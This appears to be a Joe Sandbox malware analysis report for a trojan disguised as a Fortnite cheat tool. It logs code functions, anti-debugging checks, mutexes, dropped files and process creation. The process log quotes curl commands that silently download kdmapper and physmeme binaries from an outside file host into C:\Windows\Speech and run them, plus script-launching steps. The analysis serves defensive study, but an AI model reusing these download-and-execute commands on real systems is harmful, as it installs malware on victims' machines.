Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_00637153	6_2_00637153
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006451C9	6_2_006451C9
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006232F7	6_2_006232F7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006362CA	6_2_006362CA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006343BF	6_2_006343BF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062F461	6_2_0062F461
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0064D440	6_2_0064D440
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062C426	6_2_0062C426
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006377EF	6_2_006377EF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062286B	6_2_0062286B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0064D8EE	6_2_0064D8EE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006519F4	6_2_006519F4
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062E9B7	6_2_0062E9B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_00636CDC	6_2_00636CDC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_00633E0B	6_2_00633E0B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062EFE2	6_2_0062EFE2
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_00644F9A	6_2_00644F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00438040	12_2_00438040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042C070	12_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449070	12_2_00449070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401000	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040B0E0	12_2_0040B0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040C080	12_2_0040C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D150	12_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004491F0	12_2_004491F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041F193	12_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409240	12_2_00409240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042C243	12_2_0042C243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004492F0	12_2_004492F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043E2A0	12_2_0043E2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004012B3	12_2_004012B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401359	12_2_00401359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00416361	12_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D3CC	12_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004493D0	12_2_004493D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004483B0	12_2_004483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004113BD	12_2_004113BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00405460	12_2_00405460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00447429	12_2_00447429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004094D7	12_2_004094D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040A4E0	12_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042B490	12_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004074B0	12_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040B570	12_2_0040B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004366E0	12_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041D6A0	12_2_0041D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449700	12_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004117C0	12_2_004117C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042F7DB	12_2_0042F7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00408850	12_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403890	12_2_00403890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044A8B0	12_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004488B0	12_2_004488B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00436970	12_2_00436970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0045392E	12_2_0045392E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041399C	12_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040AA00	12_2_0040AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427AFB	12_2_00427AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042BC50	12_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00413CC6	12_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042CCDD	12_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042CCF5	12_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00429DF2	12_2_00429DF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437D90	12_2_00437D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040CE00	12_2_0040CE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00431E00	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00415EF6	12_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407EB0	12_2_00407EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427F62	12_2_00427F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00443FA0	12_2_00443FA0
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFAAC300D80	16_2_00007FFAAC300D80
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFAAC6F2B5A	16_2_00007FFAAC6F2B5A
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC320D80	35_2_00007FFAAC320D80
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC351225	35_2_00007FFAAC351225
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC35D30A	35_2_00007FFAAC35D30A
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC35BF42	35_2_00007FFAAC35BF42
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC3597E0	35_2_00007FFAAC3597E0
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC330B06	35_2_00007FFAAC330B06
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC3311A9	35_2_00007FFAAC3311A9
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC33177E	35_2_00007FFAAC33177E
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC330FC7	35_2_00007FFAAC330FC7
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC361225	37_2_00007FFAAC361225
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC36BF42	37_2_00007FFAAC36BF42
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC3697E0	37_2_00007FFAAC3697E0
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC340B06	37_2_00007FFAAC340B06
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC330D80	37_2_00007FFAAC330D80
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC3411A9	37_2_00007FFAAC3411A9
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC34177E	37_2_00007FFAAC34177E
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC340FC7	37_2_00007FFAAC340FC7
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC310D80	38_2_00007FFAAC310D80
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC320B06	38_2_00007FFAAC320B06
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC341225	38_2_00007FFAAC341225
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC34D30A	38_2_00007FFAAC34D30A
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC34BF42	38_2_00007FFAAC34BF42
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC3497E0	38_2_00007FFAAC3497E0
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC3211A9	38_2_00007FFAAC3211A9
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC32177E	38_2_00007FFAAC32177E
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC320FC7	38_2_00007FFAAC320FC7
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC330D80	39_2_00007FFAAC330D80
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC361225	39_2_00007FFAAC361225
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC36D30A	39_2_00007FFAAC36D30A
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC36BF42	39_2_00007FFAAC36BF42
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC3697E0	39_2_00007FFAAC3697E0
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC340B06	39_2_00007FFAAC340B06
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC3411A9	39_2_00007FFAAC3411A9
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC34177E	39_2_00007FFAAC34177E
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC340FC7	39_2_00007FFAAC340FC7
Source: C:\Edge\msedge.exe	Code function: 42_2_00007FFAAC330D80	42_2_00007FFAAC330D80
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 43_2_00007FFAAC320D80	43_2_00007FFAAC320D80
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC330D80	49_2_00007FFAAC330D80
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC361225	49_2_00007FFAAC361225
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC36D30A	49_2_00007FFAAC36D30A
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC36BF42	49_2_00007FFAAC36BF42
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC3697E0	49_2_00007FFAAC3697E0
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC340B06	49_2_00007FFAAC340B06
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC3411A9	49_2_00007FFAAC3411A9
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC34177E	49_2_00007FFAAC34177E
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAC340FC7	49_2_00007FFAAC340FC7
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 50_2_00007FFAAC340D80	50_2_00007FFAAC340D80
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 51_2_00007FFAAC310D80	51_2_00007FFAAC310D80
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC310D80	54_2_00007FFAAC310D80
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC341225	54_2_00007FFAAC341225
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC34BF42	54_2_00007FFAAC34BF42
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC3497E0	54_2_00007FFAAC3497E0
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC320B06	54_2_00007FFAAC320B06
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC3211A9	54_2_00007FFAAC3211A9
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC32177E	54_2_00007FFAAC32177E
Source: C:\Edge\msedge.exe	Code function: 54_2_00007FFAAC320FC7	54_2_00007FFAAC320FC7

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\ASIzYbXK.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: String function: 00007FF67417E8B0 appears 142 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0063EB78 appears 39 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0063EC50 appears 56 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0063F5F0 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CBE0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EE60 appears 145 times

Source: OPvxZeSl.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XkTUfoHN.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HiOQLkRz.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vpYzbqhQ.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: fnSuHmrC.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: msedge.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: physmeme.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: LBUPSPkYsNXrxZEtdVzCng.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OPvxZeSl.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XkTUfoHN.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: HiOQLkRz.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vpYzbqhQ.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: fnSuHmrC.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.msedge.exe.132cbd08.14.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@79/58@16/3

Source: C:\Windows\Speech\kdmapper.exe

Code function: 6_2_00626C74 GetLastError,FormatMessageW,

6_2_00626C74

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,

0_2_00007FF674174BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004345E0 CoCreateInstance,

12_2_004345E0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 6_2_0063A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

6_2_0063A6C2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP

Source: C:\Windows\Speech\physmeme.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Jump to behavior

Source: C:\Edge\msedge.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Edge\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4516:120:WilError_03

Source: C:\Edge\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\gu021d1q

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "

Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxname	6_2_0063DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxstime	6_2_0063DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: STARTDLG	6_2_0063DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: xzg	6_2_0063DF1E

Source: gh3zRWl4or.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gh3zRWl4or.exe

ReversingLabs: Detection: 55%

Source: gh3zRWl4or.exe	String found in binary or memory: Save/Load
Source: gh3zRWl4or.exe	String found in binary or memory: Save/Load
Source: gh3zRWl4or.exe	String found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: cls Driver FoundDriver Error Contact Support. Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too longmSVUSY

Source: unknown	Process created: C:\Users\user\Desktop\gh3zRWl4or.exe "C:\Users\user\Desktop\gh3zRWl4or.exe"
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
